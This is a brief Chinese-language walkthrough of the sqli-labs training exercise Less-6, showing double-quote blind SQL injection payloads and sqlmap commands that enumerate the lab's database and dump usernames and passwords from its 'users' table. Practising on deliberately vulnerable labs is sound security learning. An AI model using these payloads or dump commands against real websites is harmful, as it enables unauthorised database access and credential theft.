sqli-lab刷题Less-6 基于盲注的双引号型sql注入
输入?id=1\,报出错误
猜测其原语句为"$id" LIMIT 0,1
输入?id=1" --+
发现其不报错,说明猜测正确
输入?id=1" order by 3 --+,不报错,输入?id=1" order by 4 --+,报错
由此可以知道只有三个字段
输入?id=1" and 1=2 union select 1,2,3 --+,发现其不回显,说明为盲注
盲注具体看这篇文章sqli-lab刷题Less-5基于盲注的单引号型注入
可以使用sqlmap进行自动化探测。
输入
sqlmap -u 对应的url,注意提交参数 --current-db --batch
得到数据库
以此类推
爆出表名
sqlmap -u 对应的url,注意提交参数 -D security --tables --batch
爆出列名
sqlmap -u 对应的url,注意提交参数 -D security -T users --columns ---batch
爆出字段值
sqlmap -u 对应的url,注意提交参数 -D security -T users -C password,username --dump --batch